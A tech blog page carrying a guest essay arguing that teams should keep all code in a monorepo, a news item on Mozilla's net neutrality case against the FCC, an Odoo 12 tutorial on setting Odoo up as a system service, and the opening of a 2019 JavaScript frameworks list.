

Why don't you have a monorepo?

Viktor Charypar
01 Feb 2019
27 min read
You've probably heard that Facebook, Twitter, Google, Microsoft, and other tech industry behemoths keep their entire codebase - all services, applications, and tools - in a single huge repository: a monorepo. If you're used to the standard way most teams manage their codebase - one application, service, or tool per repository - this sounds very strange, and many people conclude it must only solve problems the likes of Google and Facebook have.

(This is a guest post by Viktor Charypar, Technical Director at Red Badger.)

But monorepos are not only useful if you can build a custom version control system to cope. They have many advantages even at a smaller scale that standard tools like Git handle just fine. Using a monorepo can result in fewer barriers in the software development lifecycle: faster feedback loops, less time spent looking for code, and less time reporting bugs and waiting for them to be fixed. It also makes it much easier to analyze a huge treasure trove of interesting data about how your software is actually built and where the problem areas are.

We've used a monorepo at one of our clients for almost three years and it's been great. I really don't see why you wouldn't. But roughly every two months I tend to have a conversation with someone who's not used to working this way, and the entire idea seems totally crazy to them. The conversation tends to always follow the same path: starting with the sheer size and quickly moving on to dependency management, testing, and versioning strategies. It gets complicated. It's time I finally wrote down a coherent case for why I believe monorepos should be the default way we manage a codebase - especially if you're building something even vaguely microservices-based, you have multiple teams, and you want to share common code.

What do you mean "just one repo"?
Just so we're all thinking about the same thing: when I say monorepo, I'm talking about a strategy of storing all the code your organization is responsible for - a project, a programme of work, or the entirety of your company's product and infrastructure code - in a single repository, under one revision history. Individual components (libraries, services, custom tools, infrastructure automation, ...) are stored alongside each other in folders. It's analogous to the UNIX file tree, which has a single root, as opposed to the multiple, device-based roots in Windows operating systems.

People not familiar with the concept typically have a fairly strong reaction to the idea. One giant repo? Why would anyone do that? That cannot possibly scale! Many different objections come out, most of them only tangentially related to storing all the code together. Occasionally, people get almost religious about it (I am talking about engineers, after all). Despite being used by some of the largest tech companies, it is a relatively foreign concept and on the surface goes against everything you've been taught about not building huge monolithic things.

It also seems like we're fixing things that are not broken: everyone in the world is doing multiple repos, building and sharing artifacts (npm modules, JARs, Ruby gems...), using SemVer to version and manage dependencies, and using long-running branches to patch bugs in older versions of code, right? Surely if it's industry standard it must be the right thing to do. Well, I don't believe so. I personally think almost every single one of those practices is harder, more laborious, more brittle, harder to test, and generally more wasteful than the equivalent approach you get as a consequence of a monorepo.
And a few of the capabilities a monorepo enables can't be replicated in a multi-repo setup even if you build a lot of infrastructure around it, basically because you introduce distributed computing problems and get on the bad side of the CAP theorem (we'll look at this more closely below). Apart from making dependency management easier and testing more reliable than it can get with multiple repos, a monorepo will also give you a few simple, important, but easy-to-underestimate advantages.

The biggest advantages of using a monorepo

It's easier to find and discover your code in a monorepo

With a monorepo, there is no question about where all the code is, and when you have access to some of it, you can see all of it. It may come as a surprise, but making code visible to the rest of the organization isn't always the default behavior. Human insecurities get in the way, and people create private repositories and squirrel code away to experiment with things "until they are ready". Typically, by the time the thing does get "ready", it has a Continuous Integration (CI) service attached, many hyperlinks lead to it from emails, chat rooms, and internal wikis, and several people have cloned the repo - so it's now quite a hassle to move the code to a more visible, obvious place, and it stays where it started. As a consequence, it is often hard work to find all the code for a project and gain access to it, which is expensive for new joiners and hurts collaboration in general. You could say this is a matter of discipline, and I would agree with you - but why leave to individual discipline what you can simply prevent by telling everyone that all the code belongs in the one repo? It's completely OK to put even little experiments and pet projects there. You never know what they will grow into, and putting them in the repo has basically no cost attached.
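That discoverability needs no special tooling - plain Git already gives you codebase-wide search. A minimal sketch, where the repository layout and the `verify_token` function are invented for the example (the throwaway repo only exists to keep it self-contained):

```shell
set -e
# Throwaway repo standing in for a monorepo (layout and names are made up).
tmp=$(mktemp -d); cd "$tmp"; git init -q
mkdir -p libs/auth services/api
printf 'def verify_token(token):\n    return True\n' > libs/auth/tokens.py
printf 'from libs.auth.tokens import verify_token\n' > services/api/app.py
git add .

# One search covers the definition and every consumer, across all components:
git grep -n 'verify_token'
```

In a multi-repo setup, the same search has to be repeated for every repository you know about - and silently misses the ones you don't.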
Visibility aids understanding of how to use internal APIs (internal in the sense of being designed and built by your organization). The ability to search the entire codebase from within your editor and find usages of the call you're considering using is very powerful. Code editors and languages can also be set up for cross-references to work, which means you can follow references into shared libraries and find usages of shared code across the codebase - and I mean the entire codebase.

This also enables all kinds of analyses to be done on the codebase and its history. Knowing the totality of the codebase and having a history of all the code lets you see dependencies, find parts of the codebase only committed to by a very limited group of people, and spot hotspots changing suspiciously frequently or touched by a large number of people... Your codebase is the source of truth about what your engineering organization is producing; it contains an incredible amount of interesting information we typically just ignore.

Monorepos give you more flexibility when moving code

Conway's Law famously states that "organizations which design systems (...) are constrained to produce designs which are copies of the communication structures of these organisations". This is due to the level of communication necessary to produce a coherent piece of software. The further away in the organisation the owner of a piece of software is, the harder it is to directly influence it, so you design strict interfaces to insulate yourself from the effects of "their" changes. This typically affects the repository structure as well. There are two problems with this: the structure is generally chosen upfront, before we know what the right shape of the software is, and changing the structure has a cost attached. With each service and library in a separate repository, the module boundaries are quite a lot stronger than if they are all in one repository.
Extracting common pieces of code into a shared library becomes more difficult, and involves setting up a whole new repository - complete with CI integration, pull request templates and labels, access control setup... hard work. In a monorepo, these boundaries are much more fluid and flexible: moving code between services and libraries, extracting new libraries, or inlining libraries back into their consumers all become as easy as any other refactoring. There is no reason to use a completely different set of tools to change the small-scale and the large-scale structure of your codebase. The only real downside is tooling support for access control and declaring ownership. However, as monorepos get more popular, this support is getting better - GitHub now supports code owners, for example. We will get there.

A monorepo gives you a single history timeline

While visibility and flexibility are quite convenient, the one feature of a monorepo that is very hard (if not impossible) to replicate is the single history timeline. We'll go into why it's so hard further below, but for now let's look at the advantages it brings. A single history timeline gives us a reliable total order of changes to the codebase over time: for any two contributions, we can definitively and reliably decide which came first and which came second. It is never ambiguous. It also means that each commit in a monorepo is a snapshot of the system as it was at that given moment. This enables a really interesting capability: cross-cutting changes can be made atomically, safely, in one go.

Atomic cross-cutting commits

Atomic cross-cutting commits make two specific scenarios much easier to achieve. First, externally forced global migrations become much easier and quicker. Let's say multiple services use a common database and need its password, and we need to rotate it. The password itself is (hopefully!)
stored in a secure credential store, but at least a reference to it will appear in several different places in the codebase. If the reference changes (say it is generated anew on every rotation), we can update every mention of it at once, in one commit, with a simple search & replace. This gets everything working again.

Second, and more importantly, we can change APIs and update both the producer and all consumers at the same time, atomically. For example, we can add an endpoint to an API service and migrate consumers to use the new endpoint. In the next commit, we can remove the old endpoint, as it's no longer needed. If you're trying to do this across multiple repositories with their own histories, the change has to be split into several parallel commits, which leaves the potential for the two changes to overlap and happen in the wrong order: some consumers get migrated, then the endpoint gets removed, then the rest of the consumers get migrated. The mid-stage is an inconsistent state, and an attempt to use a not-yet-migrated consumer will fail by calling an API endpoint that no longer exists.

Monorepos remove inconsistencies in your dependencies

Inconsistencies between dependent modules are the entire reason why dependency management and versioning exist. In a monorepo, the above scenario simply can't happen. And that's how the conversation about storing code in one place ends up being about versioning and dependency management: monorepos essentially make the problem go away (which is my favourite kind of problem solving).

Okay, this isn't entirely true. There are still consequences to making breaking changes to APIs. For one, you need to update all the consumers, which is work, but you also need to build all of them, test that everything works, and deploy it all. This is quite hard for (micro)services that get individually deployed: making a coordinated deployment of multiple services atomic is possible, but not trivial.
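To make the credential-rotation scenario above concrete, here is a sketch of the one-commit migration using plain Git. The paths, file names, and reference strings are all hypothetical, and the throwaway repository exists only to keep the example self-contained:

```shell
set -e
# Throwaway monorepo with two services referencing the same credential
# (paths, file names, and the reference string are all made up).
tmp=$(mktemp -d); cd "$tmp"; git init -q
git config user.email demo@example.com; git config user.name demo
mkdir -p services/api services/worker
echo 'DB_PASSWORD_REF=db-cred-v1' > services/api/config.env
echo 'DB_PASSWORD_REF=db-cred-v1' > services/worker/config.env
git add .; git commit -qm 'initial state'

# The rotation itself: every reference updated in one atomic commit.
git grep -l 'db-cred-v1' | xargs sed -i 's/db-cred-v1/db-cred-v2/g'
git commit -qam 'Rotate database credential reference'
```

Anyone checking out any commit sees either the old reference everywhere or the new one everywhere; no revision exists in which the system is half-migrated.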
You can use a blue-green deployment strategy, for example, to make sure there is no moment in time where some services have changed but not others. It gets harder for shared libraries: building and publishing artifacts for new versions and then updating all consumers to use them are still at least two commits, otherwise you'd be referring to versions that won't exist until the builds finish. Now things are getting inconsistent again, and the view of what is supposed to work together is getting blurred in time again. And what if someone sneaks some changes in between the two commits? We are, once again, in a race. Unless...

Building from the latest source

Yes. What if, instead of building and publishing shared code as prebuilt artifacts (binaries, JARs, gems, npm modules), we build each deployable service completely from source? Every time a service changes, it is entirely rebuilt, including all its dependencies. This is a fair bit of work for some compiled languages, but it can be optimized with incremental build tools that skip work that has already been done and cached. Some languages, like Go, solve it by simply having been designed for fast compilation. For dynamic languages, it's just a matter of setting up include paths correctly and bundling all the relevant code. The added benefit is that you don't need to do anything special when working on a set of interdependent projects locally. No more `npm link`.

The more interesting consequence is how this affects changing a shared dependency. When building from source, you have to make sure that every time that happens, all the consumers get rebuilt against it. This is great - everyone gets the latest and greatest things immediately. ...right? Don't worry, I can hear the alarm bells ringing in your head all the way from here. Your service depends on tens, if not hundreds, of libraries. Any time anyone makes a mistake and breaks any of them, it breaks your code? Hell no. But hear me out.
This is a problem of understanding dependencies and testing consumers. The important consequence of building from source is that you now have a single handle on what is supposed to work together. There are no separate versions; you know what to test, and it's just one thing at any one time.

Push dependency management

In manual dependency update management - I will call it "pull" dependency management - you as a consumer are responsible for updating your dependencies as you see fit and making sure everything still works. If you find a bug, you simply don't upgrade. Instead, you report the bug to the maintainer and expect them to fix it. This can be months after the bug was introduced, and the bug may already be fixed in a newer version you haven't upgraded to - because things have moved on quite a bit while you were busy hitting a deadline, and it would now be a sizable investment to upgrade. Now you're a little stuck, and all the ways out are a significant amount of work for someone - all because the feedback loop is too long.

Meanwhile, as a library maintainer, you're never quite certain how to make sure you're not breaking anything. Even if you could run your consumers' test suites, which consumers at what versions do you test against? And as a DevOps team doing 24/7 support for a system, how do you know which version or versions of a library are used across your services? What do you need to update to roll out that important bug fix to your customers?

In push dependency management, quite a few things are the other way round. As a consumer, you're not responsible for updating; it is done for you - effectively, you depend on the "latest" version of everything. Every time a maintainer of a library makes a change, you are responsible for testing for regressions. No, not manually! You do have unit tests, right? Right?? Please have a solid regression test suite you trust; it's 2019. So with your unit test suite in place, all you need to do is run it.
Actually, no - let's let the maintainer run it. If they introduce a problem, they get immediate feedback from you, before their change ever hits the master branch. And this is the contract in push dependency management: if you make a change and break anyone, you are responsible for fixing them; they are responsible for supplying a good enough (by their own standard) automated mechanism for you to verify things still work. The definition of "works" is that the tests pass. Seriously though, you need a decent regression test suite!

Continuous integration for push dependencies: the final piece of the monorepo puzzle

The main missing piece of tooling around monorepos is support for push dependencies in CI systems. It's quite straightforward to implement the strategy yourself, but it's still hard enough to be worth some shared tooling. Unfortunately, the existing build tools geared towards monorepos, like Bazel and Buck, take over the entire build process from more familiar tools (like Maven or Babel), and you need to switch to them - although, to be fair, you get very performant incremental builds in exchange. A lighter tool - one that lets you express dependencies between components in a monorepo in a language-agnostic way, and is only responsible for deciding which build jobs need to be triggered given the set of components changed in a commit - seems to be missing. So I built one. It's far from perfect, but it should do the trick. Hopefully, someone with more time on their hands will eventually come up with something similarly cheap to introduce into your build system, and the community will adopt it more widely.

The main takeaway is that if we build from source in a monorepo, we can set up a central Continuous Integration system responsible for triggering builds for all projects potentially affected by a change - making sure you didn't break anything with the work you did, whether it belongs to you or to someone else.
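A minimal sketch of that "which builds do we trigger?" decision, assuming components declare their dependencies in a flat file. The component names and file format are invented, the graph is assumed to be acyclic, and real tools additionally handle cycle detection, caching, and deriving the changed components from the commit itself:

```shell
set -e
tmp=$(mktemp -d); cd "$tmp"

# Declared dependencies, one edge per line: "<component> <dependency>".
cat > deps.txt <<'EOF'
svc-api lib-auth
svc-api lib-http
svc-worker lib-http
EOF

# Print a component plus everything that (transitively) consumes it.
# Assumes the dependency graph is acyclic.
affected() {
  echo "$1"
  awk -v dep="$1" '$2 == dep { print $1 }' deps.txt | while read -r consumer; do
    affected "$consumer"
  done
}

# A commit touched lib-http: these are the builds to trigger.
affected lib-http | sort -u | tee to_build.txt
```

In a real pipeline, the changed components would come from something like `git diff --name-only` mapped onto component folders, and each line of `to_build.txt` would fan out into a CI build job.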
This is next to impossible in a multi-repo codebase because of the blurriness of history mentioned above. It's interesting to me that we have this problem today in the larger ecosystem. Everywhere. And we stumble forward, somewhat successfully living with upstream changes occasionally breaking us, because we don't really have a better choice: we don't have the ability to test all the consumers in the world and fix things when we break them. But if we can, at least for our own codebase, why wouldn't we do that - along with a "you broke it, you fix it" policy? Building from source in a monorepo allows that. It also makes it significantly harder for breaking changes to slip through unnoticed. That said...

About breaking changes

There are two kinds of changes that break consumers: the ones you introduce by accident while intending to keep backwards compatibility, and the intentional ones. The first kind should not be too laborious to fix: once you find out what's wrong, fix it in one place, make sure you didn't break anything else, done. The second kind is harder. If you absolutely have to make an intentional breaking change, you will need to update all the consumers. Yes. That's the deal. And that's also fair. I'm not sure why we're okay with breaking changes being intentionally introduced upstream on a whim. In any other area of human endeavour, a breach of contract makes people angry, and they expect you to make good by them. Yet we accept breaking changes in software as a fact of life. "It's fine, I bumped the major version!"

Semantic versioning: a bad idea

It's not fine. In fact, semantic versioning is just a bad idea. I know that's a bold claim, and it deserves a whole separate article (which I promise to write soon), but I'll try to do it at least some justice here. Semantic versioning is meant to convey meaning with the version number, but the meanings it chooses to express are completely arbitrary.
First of all, semver only talks about the API contract, not behaviour. Adding side effects, or changing the performance characteristics of an API call for the worse while keeping the data interface the same, is a completely legal patch-level change - and I bet you'd consider that a breaking change, because it will break your app. Second, does anyone really care about minor vs. patch? The promise is that the API doesn't break, so really we only care about major vs. everything else. Major is a dealbreaker; otherwise we're OK. From a consumer perspective, a major version bump spells trouble and potentially a lot of work.

Making breaking changes is a mean thing to do to your consumers, and you can and should avoid them: just keep the old API around and working, and add the new one next to it. As for version numbers, the most important meaning to convey seems to be "how old?", because code tends to rot - so versioning by date might be a good choice.

But, you say, I'll have more and more code to maintain! Well yes, of course. And that's the other problem with semver: the expectation that even old versions still get patches and fixes. It's not stated very explicitly, but it's there. And because we typically maintain old versions on long-running branches in version control, it's not even very visible in the codebase. What if you kept older APIs around but deprecated them, and the answer to a bug in one of them was to migrate to the newer version of that particular call, which doesn't have the bug? Would you mind having that old code around? It just sits there in the codebase until nobody uses it. It would also be much less work for the consumer - it's just one particular call. Also, the bug is typically deeper inside your code, so it's actually likely you can fix it in one go for all the API surfaces, old or new. Doing the same thing in the branching model is N times the work (for N maintenance branches). There are technologies that follow this model out of necessity.
One example is GraphQL, which was built to solve (among other things) the problem of many old API consumers in people's hands and the need to support all of them for at least some time. In GraphQL, you deprecate data fields in your API and they become invisible in documentation and introspection calls, but they still work as they used to - possibly forever, or at least until barely anyone uses them.

The other option, if you want to keep an older version of a library around and maintain it in a monorepo, is to make a copy of the folder and work on the two separately. It's the same thing as cutting a long-running branch; you're just making the copy in "file space" rather than "branch space". And it's more visible and representative of reality: both versions exist as first-class components being maintained.

There are many different versioning and maintenance strategies you could adopt, but in my opinion the preference should be to invest effort into the latest version, making breaking changes only when absolutely inevitable (and at that point, isn't the new version just a new thing? Like Luxon, the next version of Moment.js), and making updates trivial for your consumers. And if it's trivial, you can do it for them. Ultimately, it was your decision to break the API, so you should also do the work; it's only fair, and it makes you evaluate the cost-benefit trade-off of the change.

In a monorepo with building from source, this versioning strategy happens naturally. You can, however, adopt others - you just lose some of the guarantees and make feedback loops longer. Versioning strategy is really an orthogonal concept to storing code in a single repository, but the relative costs do change if you use one: versioning with a single version that cuts across the system becomes a lot cheaper, which means breaking changes become more expensive. This tends to lead to more discussions about versioning. This is actually true for most of the things we covered above.
You can, but don't have to, adopt these strategies with a monorepo.

Pay-as-you-go monorepos

It's totally possible to just store everything in a single repo and not do anything else. You'll get the visibility of what exists and the flexibility of boundaries and ownership. You can still publish individual build artifacts and pull-manage dependencies (but you'd be missing out). Add building from source, and you get the single-snapshot benefit: you now know what code runs in a particular version of your system and, to an extent, you can think about it as a monolith, despite it being formed of many different independent modules and services. Add dependency-aware continuous integration, and the feedback loop around issues introduced while working on the codebase gets much, much shorter, allowing you to go faster and waste less time on carefully managing versions, reporting bugs, making big forklift upgrades, and so on. Things tend to get out of control much less. It's simpler.

Best of all, you can mix and match strategies. If you have a hugely popular library in your monorepo and each change to it triggers builds of hundreds of consumers, it only takes a couple of those builds being flaky to make it very hard to get changes to the library to pass. This is really a CI problem to fix (and there are many interesting strategies out there), but sometimes you can't do that easily. You could also say the feedback loop is now too tight for the scale and start versioning the library's intentional releases. This still doesn't mean you have to publish versioned artifacts: you can keep a stable copy of the library in the repo, which consumers depend on, and a development copy next to it, which the maintainers work on. Releasing then means moving changes from the development folder to the release one and getting its builds to pass. Or, if you wish, you can publish artifacts and let consumers pull them in their own time and report bugs to you.
And you still don't need to promise fixes for older versions without an upgrade to the latest. (Libraries should really publish a "code of maintenance" outlining the promises they make and setting maintenance expectations.) And if you have to, I would again recommend making a copy, not branching. In fact, in a monorepo, branching might just not be a very good idea. Temporary branches are still useful for working on proposed changes, but long-running branches hide the full truth about the system - and so does relying on old commits. The copies of code being used exist either way; they are still relevant, and you still need to consider them for testing and security patching. They are just hidden in less apparent dimensions of the codebase "space": the branch dimension or the time dimension. These are hard to think about and visualize, so maybe it's not a good idea to use them to keep relevant, current versions of the code; stick to them as change-proposal and "time travel" mechanisms. Hopefully you can see that there's an entire spectrum of strategies you can follow, without having to adopt them wholesale.

I'm sold, but... can't we do all this with a multi-repo?

Most of the things discussed above are not strictly dependent on monorepos; they are more a natural consequence of adopting one. You can follow versioning strategies other than semver outside of a monorepo. You can probably implement an automated version-bumping system which upgrades all the dependents of a library and tests them, logging issues if they don't pass. What you can't do outside of a monorepo, as far as I can tell, is atomically snapshot history to get a clear view of the system - and have the same view of the system a year ago, and be able to reproduce it. As soon as multiple parallel version histories are established, this ability goes away and you introduce distributed state. It's impossible to update all the "heads" in this multi-history at the same time, consistently.
In a version control system like Git, history is ordered by the "follows" relationship: a later version follows - points to - its predecessor. To get a consistent, canonical view of time, there needs to be a single entry point. Without that central entry point, it's impossible to define a consistent order across the entire set; it depends on where you start looking. Essentially, you have already chosen Partition tolerance from the three CAP properties, so you can now pick either Consistency or Availability. Typically, availability is important, and so you lose consistency. You could choose consistency instead, but that would mean giving up availability: to get a consistent snapshot of the state of all the repos, write access would need to be stopped while the snapshot is taken. In a monorepo, you don't have partitioning, and can therefore have both consistency and availability.

From a physics perspective, multiple repositories with their own histories effectively create a kind of spacetime, where each repository is a place and references across repos represent information propagating across space. The speed of that propagation isn't infinite - it's not instant. If changes happen in two places close enough together in time, then from the perspective of each of those places they happen in a globally inconsistent order: first the local change, then the remote one. Neither view is better or more true, and it's impossible to decide which of the changes came first. Unless, that is, we introduce an agreed-upon central point which references all the repositories that exist, so that every time one of them updates, the reference in this master gets updated and a revision is created. Congratulations, we have created a monorepo. Well done us.

The benefits of going all-in when it comes to monorepos

As I said at the beginning, adopting the monorepo approach fully will result in fewer barriers in the software development lifecycle.
You get faster feedback loops: the ability to test consumers of libraries before checking in a change, and immediate feedback when something breaks. You will spend less time looking for code and working out how it gets assembled together. You won't need to set up repositories or ask for permissions to contribute. You can spend more time solving problems that help your customers instead of problems you created for yourself. It takes some time to get the tooling set up right, but you only do it once; all later projects get the setup for free. Some of the tooling is a little lacking, but in our experience there are no showstoppers. A stable, reliable CI is an absolute must, but that's true regardless of monorepos. Monorepos should also help make builds repeatable.

The repo does eventually get big, but it takes years and years and hundreds of people to reach a size where that actually becomes a real problem. The Linux kernel is a monorepo, and it's probably still at least an order of magnitude bigger than your project (it is bigger than ours, anyway, despite our having hundreds of engineers involved at this point). Basically, you're not Google or Microsoft - and when you are, you'll be able to afford to optimize your version control system. The UX of your code review and source hosting tooling is probably the first thing that will break, not the underlying infrastructure. For smoother scaling, the one recommendation I have is to set a file size limit: accidentally committed large files are quite hard to remove, at least in Git.

After using a monorepo for over two years, we're yet to hit any big technical issues with it (plenty of political ones, but that's a story for another day), and we see the same benefits as Google reported in their recent paper. I honestly don't know why you would start with any other strategy.

Viktor Charypar is Technical Director at Red Badger, a digital consultancy based in London.
You can follow him on Twitter @charypar or read more of his writing on the Red Badger blog here.


The future of net neutrality is being decided in court right now, as Mozilla takes on the FCC

Richard Gall
01 Feb 2019
3 min read
Back in August, in a bid to defend net neutrality, Mozilla filed a case against the FCC, opposing the FCC's rollback of the rules that defend users against the interests of ISPs. Today, the oral arguments in that case came to court in Washington, D.C., making it an important day in the fight to save the very principle of net neutrality.

What is net neutrality and why did the FCC roll it back?

To understand the significance of today, it's important to know what net neutrality is, exactly, and how and why the FCC removed the rules that put it in place. Essentially, net neutrality is the principle that all internet service providers must treat all content and services equally. It means your internet provider can't slow your access to Netflix, or prevent you from accessing any other content for commercial reasons. Net neutrality protects users like you and me, and prevents a market from emerging where companies and individuals can pay more for faster speeds or more access to services.

The argument against net neutrality is grounded in the liberal economic principle that sees regulation as necessarily restrictive. It suggests that regulation will actually lead to price rises, rather than pushing them down. From a political perspective, too, the argument is that regulating the internet in this way effectively puts it under government control. That's misleading, but it's easy to see how the argument can be peddled.

The two key arguments in the net neutrality case against the FCC

The case will center on two arguments. The first is whether the FCC's decision to repeal the legislation was warranted in the first place. As a federal agency, the FCC is forbidden by the Administrative Procedure Act from making decisions that could be described as "arbitrary and capricious". In essence, this means it can't make decisions based on the opinions and personal judgements of those who lead the organization.
All regulatory decisions need to be clear and considered, and, of course, backed up by compelling evidence. From the FCC's perspective, the decision to repeal net neutrality legislation was sound. The agency argued, for example, that the rules were damaging investment in infrastructure, and restricting private businesses from developing their products and services in a way that would ultimately benefit users. This position has, however, been disputed by a Wired report that found that investment from market leaders was high during the period when net neutrality legislation was in place. The second point that will be crucial is whether ISPs are information services or telecommunications providers. This distinction is important - information services are less tightly regulated than telecommunications (think of all the various ways subscription services make money). Under net neutrality rules, ISPs are regarded as telecommunications companies - by removing net neutrality rules, the FCC is saying they are merely information services. At court already this morning, Pantelis Michalopoulos, one of the plaintiff attorneys against the FCC, compared the assertion that an ISP isn't a telecommunications company to Magritte's famous painting The Treachery of Images. "This is like a surrealist painting that shows a pipe and says ‘this is not a pipe,’" the EFF reports he said in court.

https://twitter.com/EFFLive/status/1091351488540995584

How to follow the case

Representatives from the Electronic Frontier Foundation are live tweeting from the courtroom from @EFFLive. If you want to follow the debates and arguments - as well as plenty of useful commentary and information from the EFF - make sure you follow them.

How to set up Odoo as a system service [Tutorial]

Sugandha Lahoti
01 Feb 2019
7 min read
In this tutorial, we'll learn the basics of setting up Odoo as a system service. This article is taken from the book Odoo 12 Development Essentials by Daniel Reis. This book will help you extend your skills with Odoo 12 to build resourceful and open source business applications. Setting up and maintaining servers is a non-trivial topic in itself and should be done by specialists. The information given here is not enough to ensure an average user can create a resilient and secure environment that hosts sensitive data and services. In this article, we'll discuss the following topics:

Setting up Odoo as a system service, including the following:
Creating a systemd service
Creating an Upstart or sysvinit service
Checking the Odoo service from the command line

The code and scripts used here can be found in the ch14/ directory of the Git repository.

Setting up Odoo as a system service

We will learn how to set up Odoo as a system service and have it started automatically when the system boots. In Ubuntu or Debian, the init system is responsible for starting services. Historically, Debian (and derived operating systems) has used sysvinit, and Ubuntu has used a compatible system called Upstart. Recently, however, this has changed, and the init system used in both the latest Debian and Ubuntu editions is systemd. This means that there are now two different ways to install a system service, and you need to pick the correct one depending on the version of your operating system. On Ubuntu 16.04 and later, you should be using systemd. However, older versions are still used by many cloud providers, so there is a good chance that you might still need to work with sysvinit or Upstart. To check whether systemd is used in your system, try the following command:

$ man init

This command opens the documentation for the init system currently in use, so you're able to check what is being used.
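As a quicker alternative to reading the man page, you can also check for systemd directly. The heuristic below is a common shell convention rather than a command from the book: systemd creates the /run/systemd/system directory at boot, so its presence is a reliable signal.

```shell
# Detect the init system: systemd creates /run/systemd/system at boot,
# so its presence is a reliable signal. Otherwise, inspect PID 1's name.
if [ -d /run/systemd/system ]; then
  echo "systemd"
else
  ps -p 1 -o comm= 2>/dev/null || echo "unknown"
fi
```

On a systemd machine this prints systemd; on older systems it typically prints the name of the traditional init process instead.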
Ubuntu on Windows Subsystem for Linux (WSL) is an environment good enough for development only; it may have some quirks and is entirely inappropriate for running production servers. At the time of writing, our tests revealed that while man init identifies the init system as systemd, installing a systemd service doesn't work, while installing a sysvinit service does.

Creating a systemd service

If the operating system you're using is recent, such as Debian 8 or Ubuntu 16.04, you should be using systemd for the init system. To add a new service to the system, simply create a file describing it. Create a /lib/systemd/system/odoo.service file with the following content:

[Unit]
Description=Odoo
After=postgresql.service

[Service]
Type=simple
User=odoo
Group=odoo
ExecStart=/home/odoo/odoo-12/odoo-bin -c /etc/odoo/odoo.conf

[Install]
WantedBy=multi-user.target

The Odoo source code includes a sample odoo.service file inside the debian/ directory. Instead of creating a new file, you can copy it and then make the required changes. At the very least, the ExecStart option should be changed according to your setup. Next, we need to register the new service with the following command:

$ sudo systemctl enable odoo.service

To start this new service, use the following command:

$ sudo systemctl start odoo

To check its status, run the following command:

$ sudo systemctl status odoo

Finally, if you want to stop it, use the following command:

$ sudo systemctl stop odoo

Creating an Upstart or sysvinit service

If you're using an older operating system, such as Debian 7 or Ubuntu 15.04, chances are your system is using sysvinit or Upstart. For the purpose of creating a system service, both should behave in the same way. Some cloud Virtual Private Server (VPS) services are still based on older Ubuntu images, so you should be aware of this scenario in case you encounter it when deploying your Odoo server. The Odoo source code includes an init script used for the Debian packaged distribution.
We can use it as our service init script with minor modifications, as follows:

$ sudo cp /home/odoo/odoo-12/debian/init /etc/init.d/odoo
$ sudo chmod +x /etc/init.d/odoo

At this point, you might want to check the content of the init script. The key parameters are assigned to variables at the top of the file, as illustrated in the following example:

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
DAEMON=/usr/bin/odoo
NAME=odoo
DESC=odoo
CONFIG=/etc/odoo/odoo.conf
LOGFILE=/var/log/odoo/odoo-server.log
PIDFILE=/var/run/${NAME}.pid
USER=odoo

These variables should be adequate, so we'll prepare the rest of the setup with their default values in mind. However, you can, of course, change them to better suit your needs. The USER variable is the system user under which the server will run. We have already created the expected odoo user. The DAEMON variable is the path to the server executable. Our executable used to start Odoo is in a different location, but we can create the following symbolic link to it:

$ sudo ln -s /home/odoo/odoo-12/odoo-bin /usr/bin/odoo
$ sudo chown -h odoo /usr/bin/odoo

The CONFIG variable is the configuration file we need to use. In a previous section, we created a configuration file in the default expected location, /etc/odoo/odoo.conf. Finally, the LOGFILE variable is the log file to write to. It is expected to be inside the /var/log/odoo directory, which we created when we defined the configuration file.
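Before starting the service, it can be worth verifying that the paths those variables point to actually exist. The following loop is our own sanity check, not part of the book's scripts:

```shell
# Sanity-check the paths referenced by the init script's variables
# (DAEMON, CONFIG, and the LOGFILE directory) before starting the service.
for path in /usr/bin/odoo /etc/odoo/odoo.conf /var/log/odoo; do
  if [ -e "$path" ]; then
    echo "ok:      $path"
  else
    echo "missing: $path"
  fi
done
```

Any "missing" line points at a step above that was skipped or went wrong.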
Now we should be able to start and stop our Odoo service, as follows:

$ sudo /etc/init.d/odoo start
Starting odoo: ok

Stopping the service is done in a similar way with the following command:

$ sudo /etc/init.d/odoo stop
Stopping odoo: ok

In Ubuntu, the service command can also be used, as follows:

$ sudo service odoo start
$ sudo service odoo status
$ sudo service odoo stop

Now we need to make the service start automatically on system boot; this can be done with the following command:

$ sudo update-rc.d odoo defaults

After this, when we reboot our server, the Odoo service should start automatically and with no errors. It's a good time to verify that all is working as expected.

Checking the Odoo service from the command line

At this point, we can confirm whether our Odoo instance is up and responding to requests as expected. If Odoo is running properly, we should be able to get a response from it and see no errors in the log file. We can check whether Odoo is responding to HTTP requests inside the server by using the following command:

$ curl http://localhost:8069
<html><head><script>window.location = '/web' + location.hash;</script></head></html>

In addition, to see what is in the log file, use the following command:

$ sudo less /var/log/odoo/odoo-server.log

You can also follow what is being added to the log file live, using tail -f as follows:

$ sudo tail -f /var/log/odoo/odoo-server.log

Summary

In this tutorial, we learned about the steps required for setting up Odoo as a system service. To learn more about Odoo, you should read our book Odoo 12 Development Essentials. You may also take a look at the official documentation at https://www.odoo.com/documentation. Odoo is an open source product with a vibrant community. Getting involved, asking questions, and contributing is a great way not only to learn but also to build a business network.
With this in mind, we can't help but mention the Odoo Community Association (OCA), which promotes collaboration and quality open source code. You can learn more about it at odoo-community.org.

“Everybody can benefit from adopting Odoo, whether you’re a small start-up or a giant tech company” - an interview with Yenthe van Ginneken
Implement an effective CRM system in Odoo 11 [Tutorial]
Handle Odoo application data with ORM API [Tutorial]

16 JavaScript frameworks developers should learn in 2019

Bhagyashree R
27 Jan 2019
14 min read
According to Stack Overflow’s Developer Survey 2018, JavaScript is one of the most widely used programming languages. Thanks to its ever-evolving framework ecosystem, developers can find the best solution for complex and challenging problems. Although JavaScript has spent most of its lifetime being associated with web development, in recent years, its usage seems to be expanding. Not only has it moved from front to back end, we’re also beginning to see it used for things like machine learning and augmented reality. JavaScript’s evolution is driven by frameworks. And although there are a few that seem to be leading the way, there are many other smaller tools that could be well worth your attention in 2019. Let’s take a look at them now.

JavaScript web development frameworks

React

